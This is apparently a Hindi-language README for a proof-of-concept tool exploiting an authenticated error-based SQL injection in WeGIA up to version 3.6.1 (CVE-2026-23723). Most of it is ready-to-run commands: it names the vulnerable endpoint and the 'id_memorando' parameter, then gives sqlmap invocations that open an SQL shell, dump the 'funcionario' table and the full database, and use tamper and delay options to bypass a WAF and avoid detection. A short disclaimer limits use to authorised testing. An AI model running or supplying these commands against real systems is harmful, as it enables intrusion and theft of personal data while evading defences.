
यह एक हल्का Python सहायक स्क्रिप्ट है जिसे WeGIA (≤ 3.6.1) में प्रमाणित error-based SQL injection भेद्यता के लिए sqlmap-संगत PoC फ़ाइलों के निर्माण को स्वचालित करने के लिए डिज़ाइन किया गया है, जिसे GHSA-xfmp-2hf9-gfjp के रूप में पहचाना गया है।
WeGIA ≤ 3.6.1 में प्रमाणित एरर-आधारित SQL इंजेक्शन
GHSA-xfmp-2hf9-gfjp | आधिकारिक सलाह
PoC मूल लेखक / रिपोर्टर: ViniCastro2001 GHSA प्रकाशक: nilsonLazarin (परियोजना अनुरक्षक)
यह हल्का Python स्क्रिप्ट निम्नलिखित को स्वचालित करता है:
id_memorando=1* के रूप में चिह्नित)--sql-shell)requests लाइब्रेरी (अधिकांश पैठ परीक्षण वातावरण में पहले से मौजूद होती है)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# अनुशंसित: इंटरैक्टिव पासवर्ड प्रॉम्प्ट
python CVE-2026-23723.py --url http://target.com -u admin
# पासवर्ड सीधे प्रदान करें
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# कस्टम आउटपुट फ़ाइल
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
सफलतापूर्वक चलाने के बाद, स्क्रिप्ट निम्नलिखित करेगी:
लॉगिन का प्रयास करें wegia_sqlmap.req (या आपकी कस्टम फ़ाइल का नाम) उत्पन्न करें उपयोग के लिए तैयार sqlmap कमांड प्रदर्शित करें
# 1. इंटरैक्टिव MySQL-जैसा शेल (सबसे अनुशंसित)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. वर्तमान और सभी डेटाबेस दिखाएं
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. wegia डेटाबेस में तालिकाओं की सूची बनाएं
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. एक विशिष्ट तालिका डंप करें (उदाहरण: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. पूरा wegia डेटाबेस डंप करें (सावधान रहें!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
वैकल्पिक sqlmap फ़्लैग:
--proxy=http://127.0.0.1:8080 (Burp/ZAP के माध्यम से)
--tamper=space2comment,randomcase (बुनियादी WAF बाईपास)
--delay=1 (पहचान से बचने के लिए धीमा करें)
यदि स्वचालित लॉगिन विफल हो जाता है ब्राउज़र के माध्यम से मैन्युअल रूप से लॉगिन करें → पूरा Cookie हेडर कॉपी करें → sqlmap सीधे चलाएं:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
कानूनी अस्वीकरण यह PoC केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। किसी भी सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और निषिद्ध है। लेखक और योगदानकर्ता दुरुपयोग या किसी भी क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं। संदर्भ
GHSA-xfmp-2hf9-gfjp CVE-2026-23723